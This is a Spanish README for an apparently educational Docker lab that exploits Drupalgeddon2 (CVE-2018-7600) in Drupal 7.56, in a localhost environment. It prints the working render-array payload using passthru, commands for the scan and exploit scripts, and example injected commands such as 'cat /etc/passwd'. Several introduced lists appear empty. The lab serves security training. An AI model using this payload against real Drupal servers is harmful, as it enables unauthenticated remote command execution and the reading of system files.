Laboratorio educativo que demuestra la ejecución remota de código CVE-2018-7600 (Drupalgeddon2) mediante un entorno vulnerable de Drupal 7.56 basado en Docker.
Laboratorio educativo que demuestra la explotación de CVE-2018-7600 (Drupalgeddon2) utilizando un entorno vulnerable de Drupal 7.56 desplegado con Docker.
Este proyecto simula un flujo de trabajo real de evaluación de vulnerabilidades, incluyendo:
CVE-2018-7600 (Drupalgeddon2) es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en el CMS Drupal.
El problema existe en la API de Formularios de Drupal, donde la entrada controlada por el usuario puede interpretarse como arrays de render, permitiendo a los atacantes inyectar callbacks maliciosos como:
Esto conduce a la ejecución de comandos no autenticada en el servidor.
Attacker (Kali Linux)
|
| HTTP Requests
v
Drupal 7.56 (Vulnerable)
|
v
MySQL Database
cve-2018-7600-drupalgeddon2-lab
│
├── README.md
├── setup.md
├── scan.py
├── exploit.py
│
├── lab-setup/
│ └── docker-compose.yml
│
├── screenshots/
│ ├── drupal-dashboard.png
│ ├── drupal-version.png
│ └── rce-output.png
│
├── logs/
│ ├── scan_results.txt
│ └── exploit_log.txt
│
├── payloads/
│ └── payload-list.txt
│
├── report/
│ └── drupalgeddon2-report.pdf


git clone https://github.com/Meraj1312/cve-2018-7600-drupalgeddon2-lab.git
cd cve-2018-7600-drupalgeddon2-lab
docker compose up -d
http://localhost:8080
python3 scan.py http://localhost:8080
Ejemplo de salida:
[~] Scanning http://localhost:8080... VULNERABLE
python3 exploit.py http://localhost:8080 id
Ejemplo de salida:
uid=33(www-data) gid=33(www-data)
Estructura básica de payload utilizada:
name[#post_render][]=passthru
name[#type]=markup
name[#markup]=whoami
Ejemplos de comandos:
whoami
id
cat /etc/passwd
La lista completa de payloads está disponible en:
payloads/payload-list.txt
Para mantener una estructura de repositorio limpia y profesional:
Esta separación garantiza:
Este laboratorio está dirigido a:
Este proyecto es únicamente con fines educativos y de investigación.
No intentes explotar sistemas sin autorización explícita.
Los autores no son responsables del mal uso.